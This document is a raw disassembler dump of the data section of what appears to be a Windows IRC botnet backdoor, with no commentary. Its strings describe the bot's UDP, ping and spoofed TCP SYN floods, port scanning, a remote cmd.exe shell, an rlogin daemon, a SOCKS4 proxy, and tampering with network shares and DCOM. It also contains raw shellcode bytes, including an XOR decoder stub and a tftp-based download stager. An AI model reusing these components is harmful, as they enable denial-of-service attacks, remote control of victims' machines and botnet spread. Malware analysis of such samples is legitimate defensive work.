align 10h
aRd db 'rd',0 ; DATA XREF: sub_40C50A+2705�o
align 4
aRedirectTcpRed db '[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.',0
; DATA XREF: sub_40C50A+36B8�o
aRedirectFailed db '[REDIRECT]: Failed to start redirection thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3727�o
align 4
aScan_1 db 'scan',0 ; DATA XREF: sub_40C50A+271C�o
align 4
aSc db 'sc',0 ; DATA XREF: sub_40C50A+2733�o
align 4
aScanPortScanSt db '[SCAN]: Port scan started: %s:%d with delay: %d(ms).',0
; DATA XREF: sub_40C50A+35BE�o
align 10h
aScanFailedTo_3 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_40C50A+362D�o
align 4
aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_40C50A+274A�o
align 10h
aC_pm db 'c_pm',0 ; DATA XREF: sub_40C50A+2761�o
align 4
aSSS_2 db '[%s] <%s> %s',0 ; DATA XREF: sub_40C50A+353A�o
align 4
aC_action db 'c_action',0 ; DATA XREF: sub_40C50A+2778�o
align 4
aC_a db 'c_a',0 ; DATA XREF: sub_40C50A+278F�o
dword_441368 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_40C50A+33AF�o
aSSS_1 db '[%s] * %s %s',0 ; DATA XREF: sub_40C50A+343D�o
align 4
aFofofo db 'fofofo',0 ; DATA XREF: sub_40C50A+27B8�o
align 4
aF0f0f0 db 'f0f0f0',0 ; DATA XREF: sub_40C50A+27CF�o
align 4
aScanAlreadyDSc db '[SCAN]: Already %d scanning threads. Too many specified.',0
; DATA XREF: sub_40C50A+3022�o
align 10h
aScanFailedTo_0 db '[SCAN]: Failed to start scan, port is invalid.',0
; DATA XREF: sub_40C50A+3114�o
align 10h
aScanFailedTo_1 db '[SCAN]: Failed to start scan, no IP specified.',0
; DATA XREF: sub_40C50A+3171�o
align 10h
aRandom_0 db 'Random',0 ; DATA XREF: sub_40C50A+32AF�o
align 4
aSequential db 'Sequential',0 ; DATA XREF: sub_40C50A+32B6�o
align 4
aScanSPortScanS db '[SCAN]: %s Port Scan started on %s:%d with a delay of %d seconds '
; DATA XREF: sub_40C50A+32E1�o
db 'for %d minutes using %d threads.',0
align 4
aScanFailedTo_2 db '[SCAN]: Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_40C50A+3350�o
align 4
aUdpflood db 'udpflood',0 ; DATA XREF: sub_40C50A+27E6�o
align 4
aUdp db 'udp',0 ; DATA XREF: sub_40C50A+27FD�o
aU: ; DATA XREF: sub_40C50A+2814�o
unicode 0, <u>,0
aUdpSendingDPac db '[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).'
; DATA XREF: sub_40C50A+2F82�o
db 0
align 4
aUdpFailedToSta db '[UDP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_40C50A+2FF1�o
align 4
aPingflood db 'pingflood',0 ; DATA XREF: sub_40C50A+282B�o
align 4
aPing_1 db 'ping',0 ; DATA XREF: sub_40C50A+2842�o
align 4
aP: ; DATA XREF: sub_40C50A+2859�o
unicode 0, <p>,0
aPingSendingDPi db '[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).'
; DATA XREF: sub_40C50A+2E3B�o
db 0
align 4
aPingFailedToSt db '[PING]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_40C50A+2EA6�o
align 4
aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_40C50A+2EBB�o
align 10h
aTcpflood db 'tcpflood',0 ; DATA XREF: sub_40C50A+2870�o
align 4
aTcp db 'tcp',0 ; DATA XREF: sub_40C50A+2887�o
aSyn_1 db 'syn',0 ; DATA XREF: sub_40C50A+2C2F�o
aAck db 'ack',0 ; DATA XREF: sub_40C50A+2C47�o
aRandom db 'random',0 ; DATA XREF: sub_40C50A+2C5E�o
align 10h
aSpoofed db 'Spoofed',0 ; DATA XREF: sub_40C50A+2D03�o
aNormal db 'Normal',0 ; DATA XREF: sub_40C50A+2D0A�o
align 10h
aTcpSSFloodingS db '[TCP]: %s %s flooding: (%s:%s) for %s seconds.',0
; DATA XREF: sub_40C50A+2D1A�o
align 10h
aTcpFailedToSta db '[TCP]: Failed to start flood thread, error: <%d>.',0
; DATA XREF: sub_40C50A+2D94�o
align 4
aTcpInvalidFl_0 db '[TCP]: Invalid flood time must be greater than 0.',0
; DATA XREF: sub_40C50A:loc_40F2A8�o
align 4
aTcpInvalidFloo db '[TCP]: Invalid flood type specified.',0 ; DATA XREF: sub_40C50A+2C6E�o
align 10h
aEmail db 'email',0 ; DATA XREF: sub_40C50A+289E�o
align 4
asc_441708: ; DATA XREF: sub_40C50A+28E8�o
unicode 0, < >,0
a__2: ; DATA XREF: sub_40C50A+28ED�o
unicode 0, <_>,0
aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_40C50A+2989�o
db 'mail from: <%s>',0Ah
db 'rcpt to: <%s>',0Ah
db 'data',0Ah
db 'subject: %s',0Ah
db 'from: %s',0Ah
db '%s',0Ah
db '.',0Ah,0
aEmailMessageSe db '[EMAIL]: Message sent to %s.',0 ; DATA XREF: sub_40C50A+29FD�o
align 4
aHttpcon db 'httpcon',0 ; DATA XREF: sub_40C50A+2A19�o
aHcon db 'hcon',0 ; DATA XREF: sub_40C50A+2A30�o
align 4
aUpload db 'upload',0 ; DATA XREF: sub_40C50A+2A53�o
align 4
aFtpFileNotFoun db '[FTP]: File not found: %s.',0 ; DATA XREF: sub_40C50A+2A76�o
align 10h
aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_40C50A+2AFC�o
align 10h
aAb db 'ab',0 ; DATA XREF: sub_40C50A+2B0D�o
align 4
aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_40C50A+2B31�o
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'put %s',0Dh,0Ah
db 'bye',0Dh,0Ah,0
align 4
aSS_11 db '-s:%s',0 ; DATA XREF: sub_40C50A+2B51�o
align 10h
aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_40C50A+2B68�o
aOpen_1 db 'open',0 ; DATA XREF: sub_40C50A+2B6D�o
align 10h
aFtpUploadingFi db '[FTP]: Uploading file: %s to: %s',0 ; DATA XREF: sub_40C50A+2B7F�o
align 4
aFtpUploading_0 db '[FTP]: Uploading file: %s to: %s failed.',0
; DATA XREF: sub_40C50A:loc_40F090�o
align 10h
aRedirectClient db '[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_412814+E1�o
align 4
aRedirectFail_0 db '[REDIRECT]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_412814+156�o
aRedirectClie_0 db '[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_41299C+E1�o
align 4
aRedirectFail_1 db '[REDIRECT]: Failed to start connection thread, error: <%d>.',0
; DATA XREF: sub_41299C+1AA�o
aPrivmsgSS db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_412C88+33�o
aS_31 db '%s',0 ; DATA XREF: sub_412C88+4C�o
align 4
aCmdCouldNotRea db '[CMD]: Could not read data from proccess',0Dh,0Ah,0
; DATA XREF: sub_412D0F:loc_412DF5�o
align 4
aCmdProccessHas db '[CMD]: Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_412D0F+10F�o
align 4
aCmdCouldNotR_0 db '[CMD]: Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_412D0F:loc_412E41�o
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_412E64+20�o
aCmdRemoteComma db '[CMD]: Remote Command Prompt',0 ; DATA XREF: sub_412E64+150�o
align 10h
aCmdFailedToSta db '[CMD]: Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_412E64+198�o
align 10h
aRlogindErrorGe db '[RLOGIND]: Error: getpeername(): <%d>.',0 ; DATA XREF: sub_41301C+E1�o
align 4
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_41301C+172�o
align 4
aRlogindUserLog db '[RLOGIND]: User logged in: <%s@%s>.',0 ; DATA XREF: sub_41301C+1A2�o
aRlogindErrorSe db '[RLOGIND]: Error: SessionRun(): <%d>.',0 ; DATA XREF: sub_41301C+1C2�o
align 4
aRlogindUserL_0 db '[RLOGIND]: User logged out: <%s@%s>.',0 ; DATA XREF: sub_41301C+1E9�o
align 10h
aRlogindProtoco db '[RLOGIND]: Protocol string too long.',0
; DATA XREF: sub_413221:loc_413266�o
align 4
aRlogindLoginRe db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
; DATA XREF: sub_41327B+1B�o
align 4
aRlogindLogin_0 db '[RLOGIND]: Login rejected, Remote user: <%s@%s>.',0
align 10h
aRlogindErrorWs db '[RLOGIND]: Error: WSAStartup(): <%d>.',0 ; DATA XREF: sub_4132AA+3D�o
align 4
aRlogindFaile_0 db '[RLOGIND]: Failed to install control-C handler, error: <%d>.',0
; DATA XREF: sub_4132AA+70�o
align 4
aRlogindReadyAn db '[RLOGIND]: Ready and waiting for incoming connections.',0
; DATA XREF: sub_4132AA+106�o
align 10h
aRlogindClientC db '[RLOGIND]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_4132AA+177�o
aRlogindFaile_1 db '[RLOGIND]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_4132AA+1FB�o
align 4
aRlogindError_0 db '[RLOGIND]: Error: server failed, returned: <%d>.',0
; DATA XREF: sub_4132AA+219�o
align 10h
aConst db 'const',0
align 4
dd 0
dword_441CCC dd 1 ; DATA XREF: sub_4138AA+7�o
off_441CD0 dd offset sub_413532 ; DATA XREF: sub_4138AA+49�r
aLetter db 'letter',0
align 10h
dd 2, 413590h, 706D6F63h, 2 dup(0)
dd 3, 4135DDh, 6E756F63h, 797274h, 0
dd 4, 413683h, 736Fh, 2 dup(0)
dd 5, 4136F8h
dword_441D24 dd 7325h ; DATA XREF: sub_413532+19�o
aSI_2 db '%s%i',0 ; DATA XREF: sub_413532+40�o
align 10h
aPc db 'PC',0 ; DATA XREF: .text:004135E3�o
; sub_4138AA+39�o
align 4
aPc_0 db 'PC',0 ; DATA XREF: .text:0041360D�o
align 4
aPc_1 db 'PC',0 ; DATA XREF: .text:00413639�o
align 4
aSI db '%s%i',0 ; DATA XREF: .text:00413664�o
align 4
aS_32 db '%s|',0 ; DATA XREF: .text:004136B2�o
aSI_0 db '%s%i',0 ; DATA XREF: .text:004136D9�o
align 10h
a95 db '95',0 ; DATA XREF: .text:00413747�o
align 4
aNt db 'NT',0 ; DATA XREF: .text:00413755�o
align 4
a98 db '98',0 ; DATA XREF: .text:00413765�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:00413775�o
align 10h
a2k db '2K',0 ; DATA XREF: .text:0041378E�o
align 4
aXp db 'XP',0 ; DATA XREF: .text:0041379E�o
align 4
a2k3 db '2K3',0 ; DATA XREF: .text:004137AC�o
a??? db '???',0 ; DATA XREF: .text:loc_4137B3�o
aS_33 db '[%s]|',0 ; DATA XREF: .text:004137BC�o
align 4
aSI_1 db '%s%i',0 ; DATA XREF: .text:004137E3�o
align 10h
aMirc_2 db 'mIRC',0 ; DATA XREF: sub_413802+1F�o
align 4
aM_0 db '[M]',0 ; DATA XREF: sub_413802+2C�o
aDS db '[%d]%s',0 ; DATA XREF: sub_413802+3A�o
align 4
aMirc_3 db 'mIRC',0 ; DATA XREF: sub_413802:loc_413851�o
align 4
aM_1 db '[M]',0 ; DATA XREF: sub_413802+5C�o
aScanIpSPortD_0 db '[SCAN]: IP: %s Port: %d is open.',0 ; DATA XREF: sub_413913+92�o
align 4
aScanScanningIp db '[SCAN]: Scanning IP: %s, Port: %d.',0 ; DATA XREF: sub_4139E0+41�o
align 4
off_441DE8 dd offset aIpc ; DATA XREF: sub_413B31+1B3�o
; sub_413E55+179�o
; "IPC$"
align 10h
dd offset aAdmin_1 ; "ADMIN$"
align 8
off_441DF8 dd offset aC_4 ; DATA XREF: sub_413E55+1E1�o
; "C$"
dd offset aC_5 ; "C:\\"
dd offset aD_2 ; "D$"
dd offset aD_3 ; "D:\\"
aIpc db 'IPC$',0 ; DATA XREF: sub_413B31+217�o
; .data:off_441DE8�o
align 10h
aAdmin_1 db 'ADMIN$',0 ; DATA XREF: .data:00441DF0�o
align 4
aC_4 db 'C$',0 ; DATA XREF: .data:off_441DF8�o
align 4
aC_5 db 'C:\',0 ; DATA XREF: .data:00441DFC�o
aD_2 db 'D$',0 ; DATA XREF: .data:00441E00�o
align 4
aD_3 db 'D:\',0 ; DATA XREF: .data:00441E04�o
word_441E28 dw 4Eh ; DATA XREF: sub_413B31+38�r
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_413B31+54�o
align 4
aSecureDisableD db '[SECURE]: Disable DCOM failed.',0 ; DATA XREF: sub_413B31+66�o
align 4
aSecureDcomDisa db '[SECURE]: DCOM disabled.',0 ; DATA XREF: sub_413B31:loc_413B9E�o
align 4
aSecureFailed_1 db '[SECURE]: Failed to open DCOM registry key.',0
; DATA XREF: sub_413B31+91�o
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_413B31+ED�o
align 4
aSecureFailed_2 db '[SECURE]: Failed to restrict access to the IPC$ Share.',0
; DATA XREF: sub_413B31+106�o
align 4
aSecureRestrict db '[SECURE]: Restricted access to the IPC$ Share.',0
; DATA XREF: sub_413B31:loc_413C3E�o
align 4
aSecureFailed_3 db '[SECURE]: Failed to open IPC$ Restriction registry key.',0
; DATA XREF: sub_413B31:loc_413C5C�o
aSecureAdvapi32 db '[SECURE]: Advapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_413B31:loc_413C63�o
align 10h
aSecureShareS_0 db '[SECURE]: Share ',27h,'%S',27h,' deleted.',0
; DATA XREF: sub_413B31+25B�o
align 10h
aSecureFailed_5 db '[SECURE]: Failed to delete ',27h,'%S',27h,' share.',0
; DATA XREF: sub_413B31:loc_413D93�o
align 4
aSecureShareSDe db '[SECURE]: Share ',27h,'%s',27h,' deleted.',0
; DATA XREF: sub_413B31+1C8�o
align 4
aSecureFailed_4 db '[SECURE]: Failed to delete ',27h,'%s',27h,' share.',0
; DATA XREF: sub_413B31:loc_413D00�o
align 10h
aSecureNetworkS db '[SECURE]: Network shares deleted.',0 ; DATA XREF: sub_413B31+2CF�o
align 4
aSecureNetapi32 db '[SECURE]: Netapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_413B31+2E5�o
align 10h
word_442060 dw 59h ; DATA XREF: sub_413E55+38�r
align 4
aEnabledcom_0 db 'EnableDCOM',0 ; DATA XREF: sub_413E55+54�o
align 10h
aSecureEnableDc db '[SECURE]: Enable DCOM failed.',0 ; DATA XREF: sub_413E55+66�o
align 10h
aSecureDcomEnab db '[SECURE]: DCOM enabled.',0 ; DATA XREF: sub_413E55:loc_413EC2�o
aSecureFailed_6 db '[SECURE]: Failed to open DCOM registry key.',0
; DATA XREF: sub_413E55+91�o
aRestrictanon_0 db 'restrictanonymous',0 ; DATA XREF: sub_413E55+ED�o
align 4
aSecureFailed_7 db '[SECURE]: Failed to unrestrict access to the IPC$ Share.',0
; DATA XREF: sub_413E55+102�o
align 4
aSecureUnrestri db '[SECURE]: Unrestricted access to the IPC$ Share.',0
; DATA XREF: sub_413E55:loc_413F5E�o
align 4
aSecureFailed_8 db '[SECURE]: Failed to open IPC$ restriction registry key.',0
; DATA XREF: sub_413E55:loc_413F7C�o
aSecureAdvapi_0 db '[SECURE]: Advapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_413E55:loc_413F83�o
align 4
aSecureShareSAd db '[SECURE]: Share ',27h,'%s',27h,' added.',0 ; DATA XREF: sub_413E55+192�o
aSecureFailed_9 db '[SECURE]: Failed to add ',27h,'%s',27h,' share.',0
; DATA XREF: sub_413E55:loc_413FEE�o
aC_0 db '%c$',0 ; DATA XREF: sub_413E55+216�o
aC_1 db '%c:\',0 ; DATA XREF: sub_413E55+227�o
align 4
aSecureShareS_1 db '[SECURE]: Share ',27h,'%s',27h,' added.',0 ; DATA XREF: sub_413E55+263�o
aSecureFaile_10 db '[SECURE]: Failed to add ',27h,'%s',27h,' share.',0
; DATA XREF: sub_413E55:loc_4140BF�o
aSecureNetwor_0 db '[SECURE]: Network shares added.',0 ; DATA XREF: sub_413E55+2C0�o
aSecureNetapi_0 db '[SECURE]: Netapi32.dll couldn',27h,'t be loaded.',0
; DATA XREF: sub_413E55+2D8�o
align 4
aRlogindFaile_2 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_41416C+59�o
db '.',0
align 4
aRlogindFaile_3 db '[RLOGIND]: Failed to create ReadShell session thread, error: <%d>'
; DATA XREF: sub_41416C+8B�o
db '.',0
align 4
aRlogindWaitfor db '[RLOGIND]: WaitForMultipleObjects error: <%d>.',0
; DATA XREF: sub_41416C+DE�o
align 4
aRlogindFaile_4 db '[RLOGIND]: Failed to create shell stdout pipe, error: <%d>.',0
; DATA XREF: sub_4142BD+5C�o
aRlogindFaile_5 db '[RLOGIND]: Failed to create shell stdin pipe, error: <%d>.',0
; DATA XREF: sub_4142BD+7E�o
align 4
aRlogindFaile_6 db '[RLOGIND]: Failed to execute shell.',0 ; DATA XREF: sub_4142BD+AF�o
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_4143B6+8C�o
align 10h
aRlogindFaile_7 db '[RLOGIND]: Failed to execute shell, error: <%d>.',0
; DATA XREF: sub_4143B6+C3�o
align 4
aRlogindSession db '[RLOGIND]: SessionReadShellThread exited, error: <%ld>.',0
; DATA XREF: sub_41448F+A1�o
dword_44245C dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_4147FB+C4�o
db 66h, 0B9h
word_44246A dw 0FFFFh ; DATA XREF: sub_4147FB+CC�w
db 80h, 73h, 0Eh
byte_44246F db 0FFh ; DATA XREF: sub_4147FB+D3�w
dd 0F9E243h
dword_442474 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_4147FB+A2�o
db 0B1h
byte_442481 db 0FFh ; DATA XREF: sub_4147FB+AA�w
dw 7380h
db 0Ch
byte_442485 db 0FFh ; DATA XREF: sub_4147FB+B0�w
dw 0E243h
dd 0F9h
dword_44248C dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_414684+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_4424F0 dd 12h ; DATA XREF: sub_414684+3D�w
dd 70746674h, 6578652Eh, 20692D20h
aGet_1 db ' get ',0 ; DATA XREF: sub_414684+79�o
aJ_0 db 'j',0
db 0E8h
dword_442509 dd 17h ; DATA XREF: sub_414684+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_442511 dd 1 ; DATA XREF: sub_414684+45�w
byte_442515 db 0, 6Ah, 0 ; DATA XREF: sub_414684+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_44251F dd 0FFFFFFEDh ; DATA XREF: sub_414684+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h
aSocks4Server_0 db '[SOCKS4]: Server started on: %s:%d.',0 ; DATA XREF: sub_414902+A8�o
aSocks4ClientCo db '[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.',0
; DATA XREF: sub_414902+114�o
align 4
aSocks4Failed_0 db '[SOCKS4]: Failed to start client thread, error: <%d>.',0
; DATA XREF: sub_414902+18F�o
align 4
aSocks4Failed_1 db '[SOCKS4]: Failed to start server on Port %d.',0
; DATA XREF: sub_414902+1B2�o
align 4
aSocks4Authenti db '[SOCKS4]: Authentication failed. Remote userid: %s != %s.',0
; DATA XREF: sub_414B07+F2�o
align 4
aSocks4ErrorFai db '[SOCKS4]: Error: Failed to open socket(), returned: <%d>.',0
; DATA XREF: sub_414B07+18A�o
align 4
aSocks4ErrorF_0 db '[SOCKS4]: Error: Failed to connect to target, returned: <%d>.',0
; DATA XREF: sub_414B07+1F9�o
align 4
aSynDoneWithFlo db '[SYN]: Done with flood (%iKB/sec).',0 ; DATA XREF: sub_414ECB+48�o
align 4
aSynSendErrorD_ db '[SYN]: Send error: <%d>.',0 ; DATA XREF: sub_414F67+27D�o
align 4
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: sub_415273+52�o
a95_0 db '95',0 ; DATA XREF: sub_415430+46�o
align 4
aNt_0 db 'NT',0 ; DATA XREF: sub_415430+5A�o
align 4
a98_0 db '98',0 ; DATA XREF: sub_415430+6C�o
align 4
aMe_1 db 'ME',0 ; DATA XREF: sub_415430+7E�o
align 10h
a2k_0 db '2K',0 ; DATA XREF: sub_415430+98�o
align 4
aXp_0 db 'XP',0 ; DATA XREF: sub_415430+AA�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_415430+BA�o
align 10h
a???_0 db '???',0 ; DATA XREF: sub_415430:loc_4154F3�o
aSS_12 db '%s (%s)',0 ; DATA XREF: sub_415430+EB�o
word_44274C dw 3Fh ; DATA XREF: sub_415430:loc_415532�r
align 10h
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_415430:loc_415594�o
align 4
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_415430+192�o
aHhMmSs_0 db 'HH:mm:ss',0 ; DATA XREF: sub_415430+1AE�o
align 10h
aSysinfoCpuI64u db '[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB total, %sKB free. [Disk]:'
; DATA XREF: sub_415430+297�o
db ' %s total, %s free. [OS]: Windows %s (%d.%d, Build %d). [Sysdir]:'
db ' %s. [Hostname]: %s (%s). [Current User]: %s. [Date]: %s. [Time]:'
db ' %s. [Uptime]: %s.',0
align 4
aNotConnected db 'Not connected',0 ; DATA XREF: sub_4156E4+48�o
align 4
aDialUp db 'Dial-up',0 ; DATA XREF: sub_4156E4+5B�o
aLan db 'LAN',0 ; DATA XREF: sub_4156E4:loc_415751�o
off_442874 dd offset loc_412F49+5 ; DATA XREF: sub_4156E4+77�o
off_442878 dd offset loc_412F49+5 ; DATA XREF: sub_4156E4+88�o
aNetinfoTypeSS_ db '[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.',0
; DATA XREF: sub_4156E4+AE�o
align 4
aTcpErrorSocket db '[TCP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_4157B0+70�o
align 4
aTcpErrorSetsoc db '[TCP]: Error: setsockopt() failed, returned: <%d>.',0
; DATA XREF: sub_4157B0+EE�o
align 10h
aTcpInvalidTarg db '[TCP]: Invalid target IP.',0 ; DATA XREF: sub_4157B0+15F�o
align 4
aSyn_2 db 'syn',0 ; DATA XREF: sub_4157B0+2D2�o
aAck_0 db 'ack',0 ; DATA XREF: sub_4157B0+2F2�o
aRandom_2 db 'random',0 ; DATA XREF: sub_4157B0+312�o
align 4
aTcpErrorSendin db '[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returne'
; DATA XREF: sub_4157B0+44F�o
db 'd: <%d>.',0
align 4
aTcpDoneWithSFl db '[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/se'
; DATA XREF: sub_4157B0+4EB�o
db 'c (%dMB).',0
align 4
aOctet db 'octet',0 ; DATA XREF: sub_415CF4+F�o
align 4
aTftpErrorSocke db '[TFTP]: Error: socket() failed, returned: <%d>.',0
; DATA XREF: sub_415CF4+6A�o
aRb_1 db 'rb',0 ; DATA XREF: sub_415CF4+12E�o
align 10h
aTftpFailedToOp db '[TFTP]: Failed to open file: %s.',0 ; DATA XREF: sub_415CF4+15A�o
align 4
dword_442A44 dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_415CF4+399�o
aTftpFileNotFou db '[TFTP]: File not found: %s (%s).',0 ; DATA XREF: sub_415CF4+3B6�o
align 4
aTftpFileTran_1 db '[TFTP]: File transfer started to IP: %s (%s).',0
; DATA XREF: sub_415CF4+33E�o
align 4
aTftpFileTran_2 db '[TFTP]: File transfer complete to IP: %s (%s).',0
; DATA XREF: sub_415CF4+47F�o
align 4
dword_442ADC dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_415CF4+493�o
aThreadList db '-[Thread List]-',0 ; DATA XREF: sub_4162A8+10�o
aD_S_0 db '%d. %s',0 ; DATA XREF: sub_4162A8+46�o
align 10h
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_416479+35�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_416479+51�o
asc_442B40 db '*/*',0 ; DATA XREF: sub_416544+3B�o
aVisitInvalidUr db '[VISIT]: Invalid URL.',0 ; DATA XREF: sub_416544+1A0�o
align 4
aVisitCouldNotO db '[VISIT]: Could not open a connection.',0
; DATA XREF: sub_416544:loc_4166F6�o
align 4
aVisitFailedToC db '[VISIT]: Failed to connect to HTTP server.',0
; DATA XREF: sub_416544:loc_4166FD�o
align 10h
aVisitUrlVisite db '[VISIT]: URL visited.',0 ; DATA XREF: sub_416544+18C�o
align 4
aVisitFailedToG db '[VISIT]: Failed to get requested URL from HTTP server.',0
; DATA XREF: sub_416544:loc_4166D7�o
align 10h
dword_442C00 dd 1 ; DATA XREF: sub_416B00+10�r
; sub_416B00+F2�r ...
dword_442C04 dd 24h ; DATA XREF: sub_416B00:loc_416B4C�r
; sub_416B00:loc_416CB5�r ...
dword_442C08 dd 0FFFFFFFFh ; DATA XREF: sub_416B00+58�r
; sub_416F00+9E�r ...
byte_442C0C db 0FDh ; DATA XREF: sub_416B00+2B7�r
; sub_416B00+2D1�r ...
byte_442C0D db 0DDh ; DATA XREF: sub_4174F0+257�r
; sub_4174F0+39B�r ...
byte_442C0E db 0CDh ; DATA XREF: sub_416B00+2F1�r
; sub_416F00+377�r
align 10h
off_442C10 dd offset aFree ; DATA XREF: sub_4174F0+177�r
; sub_4174F0+1DD�r ...
; "Free"
dd offset aNormal_0 ; "Normal"
dd offset aCrt ; "CRT"
dd offset aIgnore ; "Ignore"
dd offset aClient ; "Client"
align 10h
dd 9875h, 9873h
off_442C38 dd offset sub_41A330 ; DATA XREF: sub_41B2D0+3�r
; sub_41B2D0+C�r
dd offset sub_41A360
dd offset sub_41A360
align 10h
off_442C50 dd offset sub_41B330 ; DATA XREF: sub_41BAE0+22�r
dword_442C54 dd 2 ; DATA XREF: sub_426060+15�r
; sub_4260B0+86�r ...
dword_442C58 dd 0 ; DATA XREF: sub_41BBF0+1F�r
; sub_41BBF0+44�r ...
off_442C5C dd offset dword_4920F0 ; DATA XREF: sub_41BBB0+29�r
; sub_41BBF0+8F�r
dd 7 dup(0)
off_442C7C dd offset dword_492120 ; DATA XREF: sub_41BBB0+1C�r
; sub_41BBF0:loc_41BC59�r
dd 3 dup(0)
off_442C8C dd offset dword_492138 ; DATA XREF: sub_41BBB0+F�r
; sub_41BBF0+75�r
dd 3 dup(0)
off_442C9C dd offset dword_492108 ; DATA XREF: sub_41BBB0+3�r
; sub_41BBF0+82�r
dd 7 dup(0)
dd 950B40h, 16h dup(0)
off_442D18 dd offset sub_41BE60 ; DATA XREF: sub_416B00+79�r
; sub_416F00+C1�r ...
dword_442D1C dd 0FFFFFFFFh ; DATA XREF: sub_41BF80+80�o
; sub_41BF80+108�o ...
dword_442D20 dd 2 ; DATA XREF: .text:0041BE9E�r
; .text:0041BEB9�r ...
dd 2 dup(4)
dword_442D2C dd 0FFFFFFFFh ; DATA XREF: .text:0041BF00�r
; .text:0041BF0C�r ...
dd 2 dup(0FFFFFFFFh)
off_442D38 dd offset aWarning ; DATA XREF: sub_41C310+284�r
; "Warning"
dd offset aError ; "Error"
dd offset aAssertionFai_1 ; "Assertion Failed"
dd 10h
dword_442D48 dd 3F8h ; DATA XREF: sub_41BDF0+7�r
; sub_41C620+3C�r ...
off_442D4C dd offset word_442D56 ; DATA XREF: sub_418730+7C�r
; sub_4194F0+2D�r ...
off_442D50 dd offset word_442D56 ; DATA XREF: sub_42A890+2A4�w
; sub_42A890+35B�w ...
db 2 dup(0)
word_442D56 dw 20h ; DATA XREF: sub_42A890:loc_42ABE1�o
; sub_42A890+35B�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_442F58 dd 1 ; DATA XREF: sub_418730+4E�r
; sub_4194F0:loc_4194F6�r ...
byte_442F5C db 2Eh ; DATA XREF: sub_41FBE0:loc_420A67�r
; sub_41FBE0+ED2�r ...
align 10h
dword_442F60 dd 1 ; DATA XREF: sub_42A100+169�w
; sub_42A100+296�w
off_442F64 dd offset aNull ; DATA XREF: sub_41EA90:loc_41EED2�r
; sub_41EA90+57C�r
; "(null)"
off_442F68 dd offset aNull_0 ; DATA XREF: sub_41EA90+514�r
; "(null)"
dword_442F6C dd 2 ; DATA XREF: sub_41F930+F�w
; sub_41F930+14�r ...
